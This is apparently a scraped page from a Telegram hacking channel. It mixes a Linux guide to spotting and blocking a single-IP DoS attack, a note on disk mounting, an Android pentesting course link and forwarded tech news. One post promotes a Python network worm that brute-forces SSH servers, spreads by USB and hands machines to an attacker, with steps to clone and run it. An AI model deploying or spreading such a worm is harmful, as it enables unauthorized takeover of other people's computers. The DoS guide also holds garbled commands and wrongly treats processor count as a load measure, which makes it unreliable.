UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.7K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to quickly check if your Linux server is under DoS attack from a single IP address ?

A) What do you need
The only thing you need to do this is a Linux server and a user with sudo privileges.

I will be demonstrating on Ubuntu Server 20.04.

We are going to use the netstat tool to find out what IPs are currently connected to your server.

To install netstat on Ubuntu, you actually install net-tools, for example:

> sudo apt-get install net-tools -y
If you are using CentOS or a Red Hat based installation, netstat should already be installed.

B) How to check your server load
The first thing we're going to do is check the load on our server.

The command we will use for this will return the number of logical processors (threads).

On the server, this number should be pretty low, but it depends on what you are running.

If you know everything is in order, make sure your number is off the charts and record the number.

If you suspect something is happening, run the flow check again and compare the results.

To check the number of logical processors, enter the command:

grep processor / proc / cpuinfo | wc -l

> If this number is significantly higher than your baseline, you may be in trouble.

For example, on my Pop! _OS I have 16 threads, but on a Nextcloud hosted Ubuntu server I only have two.

If any of these numbers doubled, I could be exposed to a DDoS attack.

C) How to check the load on your network
Next, we will check the load on our network.

It can be done with a number of tools, but I choose nload.

To install nload, enter the command:

sudo apt-get install nload -y
On CentOS, this command would be:
sudo dnf install nload -y
To run the tool, just enter the command:
nload


If this load is significantly higher than you think, you may be attacked.

How to find out which IP addresses are connected to your server
The next thing you need to do is find out which IPs are connected to your server.

For this we will use netstat like this:

netstat -ntu | awk '{print $ 5}' | cut -d: -f1 -s | sort | uniq -c | sort -nk1 -r
The output from the above command will list each IP address connected to the server and the number of instances of each.
Be sure to review this list carefully. If you see an IP address with a large number of instances (over 100), the chances of the address being the culprit for the load are pretty high.
Once you are sure of culpability, you can block the IP address with the command:

> sudo route add ADDRESS reject

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Zoom plans to collect US$ 1.5 billion through a second equity sale.
#International
Forwarded from UNDERCODE NEWS
Apple CEO Cook: Big news, but not new items, will be revealed tomorrow.
#International
Forwarded from UNDERCODE TESTING
Enjoy, Support & Share :

T.me/UndercodeUpdates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Python network worm that spreads on the local network and gives the attacker control of these machines:
You can bruteforce ssh servers, spread with USBs, etc..

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/pylyf/NetWorm.git

2) cd NetWorm

3) python worm.py

You can bruteforce ssh servers, spread with USBs, etc..

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
GPS data reveals that some consumers of Parler engaged in protests at the American Chamber of Commerce.
#International
Forwarded from UNDERCODE NEWS
Behind the scenes, performance blinds, customers and security warning for windows 10.
#Vulnerabilities
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How mount operation relates to partitioning and formatting
Mounting is one of the types of actions that you can perform on a disk (block device). Referring to the device by its name / dev / * it is possible:

1) create new sections

2) delete existing partitions

3) format partitions or entire disk
perform low-level settings at the device level (setting the read only flag at the disk level, reset the write cache on the disk, control Advanced Power Management, etc.), as well as read the values ​​of these settings and disk properties
clone the contents of a disk using the dd command (or analogs) to a file or to another disk

4) restore the contents of a disk from a file with the dd command

5) mount disk partitions (or the entire disk if not partitioned)

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
The first routine patch of the year, 83 in all, including zero-day and pre-disclosed exploits.
#CyberAttacks #Analytiques
Forwarded from UNDERCODE NEWS
Microsoft need to recruit more developers of Xbox games.
#Updates
Forwarded from UNDERCODE NEWS
RTX 3060 graphics card launched by NVIDIA: beginning at US$ 386, 12 GB video memory.
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘4.5 rating free Foundations of Hacking and Pentesting Android Apps:

Setting up Android Studio and Emulators
Basics of adb
Decompiling apks
Insecure Logging
Hardcoding Issues
Insecure Data Storage
Input Valdiation Issues
Drozer
Finding Attack Surfaces
Access Control Issues
Content Provider Injections
General Bug Hunting Tips

https://www.udemy.com/course/foundations-of-hacking-and-pentesting-android-apps/

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Join UNDERCODE’s Server on Discord 😊: https://discord.gg/JMPHbGJG